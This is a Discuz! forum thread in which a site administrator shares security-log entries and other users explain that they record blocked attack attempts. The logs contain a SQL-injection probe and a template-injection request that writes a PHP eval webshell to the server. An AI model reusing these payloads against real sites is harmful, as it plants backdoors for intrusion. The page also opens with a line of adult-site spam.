97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

Discuz! 官方交流社區(qū)

標題: 論壇被上傳一句話木馬函數(shù)eval-1719 [打印本頁]

作者: 圍城 時間: 2019-11-3 02:52
標題: 論壇被上傳一句話木馬函數(shù)eval-1719
十月份
<?PHP exit;?> 1572107794 您當前的訪問請求當中含有非法字符，已經(jīng)被系統(tǒng)拒絕 PHP:home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e User: uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572108553 您當前的訪問請求當中含有非法字符，已經(jīng)被系統(tǒng)拒絕 PHP:home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e User: uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572551909 您當前的訪問請求當中含有非法字符，已經(jīng)被系統(tǒng)拒絕 PHP:index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 User: uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
十一月份
<?PHP exit;?> 1572630519 您當前的訪問請求當中含有非法字符，已經(jīng)被系統(tǒng)拒絕 PHP:index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 User: uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>

這兩天連續(xù)被人用同一種方法掛馬了兩次，雖然有用安全軟件，沒修復(fù)的話總感覺心里不踏實。
有沒有大佬能看懂是如何掛馬的？怎么修復(fù)？使用安全軟件的Nginx防火墻的話怎么添加規(guī)則內(nèi)容？是否都需要在過濾中添加？
問題有點多，再次拜謝大佬們了
(, 下載次數(shù): 87)
(, 下載次數(shù): 103)

作者: 耗子 時間: 2019-11-4 09:52
木馬問題不是在程序本身，而是服務(wù)器的權(quán)限，是某種的木馬偽裝成圖片通過上傳頭像帖子等方式就上傳到你服務(wù)器上了，要命的是你服務(wù)器還允許執(zhí)行，
單純的清理木馬沒用的要服務(wù)器的安全最主要
您可以加我QQ129820交談，有償服務(wù)，專業(yè)清理+安防

如果在日志里，可以無視的

作者: crx349 時間: 2019-11-4 13:38
dz日志里面是已經(jīng)攔截的所以沒傳成功哦

作者: jiangchuankyo 時間: 2019-11-4 18:36
被誤攔截了, 你現(xiàn)在要做的就是關(guān)閉第三方安全軟件, 否則論壇正常功能會被破壞

作者: 圍城 時間: 2019-11-4 22:13

crx349 發(fā)表于 2019-11-4 13:38
dz日志里面是已經(jīng)攔截的所以沒傳成功哦

安全狗報毒了

作者: 圍城 時間: 2019-11-4 22:14

jiangchuankyo 發(fā)表于 2019-11-4 18:36
被誤攔截了, 你現(xiàn)在要做的就是關(guān)閉第三方安全軟件, 否則論壇正常功能會被破壞 ...

扯淡？？？？？

作者: citywar 時間: 2019-11-4 22:24
這就是別人一個嘗試。然后記錄了寫入到了log里面。帶某些特征字段
一般都不用理會

不信你自己復(fù)制那段字段加在自己域名后面瀏覽器訪問一次。一樣報錯記錄在后臺然后寫入了log日志。
然后就安全狗報警了其實沒什么用

作者: crx349 時間: 2019-11-5 11:46

圍城發(fā)表于 2019-11-4 22:13
安全狗報毒了

安全狗報毒是log文件吧如果是那只是關(guān)鍵字觸發(fā)防護規(guī)則哦

作者: jiangchuankyo 時間: 2019-11-6 11:47

圍城發(fā)表于 2019-11-4 22:13
安全狗報毒了

如果別人可以通過這種關(guān)鍵字符訪問方式就能注入成功的話, 那是程序代碼自身有了嚴重漏洞, 應(yīng)該從修復(fù)漏洞代碼入手, 據(jù)我所知DZ目前沒有這種漏洞,

如果你安裝一些第三方攔截軟件的話, 它會不管三七二十一只要內(nèi)容你有一些關(guān)鍵詞字符就給別人誤攔截訪問了,
這樣你的論壇很多正常功能也就被破壞了, 這種攔截行為自身和惡意程序又有何區(qū)別呢?

作者: 圍城 時間: 2019-11-12 16:32

citywar 發(fā)表于 2019-11-4 22:24
這就是別人一個嘗試。然后記錄了寫入到了log里面。帶某些特征字段
一般都不用理會

謝謝大佬解答

作者: 圍城 時間: 2019-11-12 16:32

crx349 發(fā)表于 2019-11-5 11:46
安全狗報毒是log文件吧如果是那只是關(guān)鍵字觸發(fā)防護規(guī)則哦

好的，謝謝

作者: 圍城 時間: 2019-11-12 16:33

jiangchuankyo 發(fā)表于 2019-11-6 11:47
如果別人可以通過這種關(guān)鍵字符訪問方式就能注入成功的話, 那是程序代碼自身有了嚴重漏洞, 應(yīng)該從修復(fù)漏洞 ...

那么你的論壇就是沒有任何安全防護在裸奔咯？

作者: dashen 時間: 2020-8-20 00:31
這是discuz自身的攔截日志文件，記錄了別人嘗試攻擊的信息，并不是被入侵成功

歡迎光臨 Discuz! 官方交流社區(qū) (http://r615.cn/)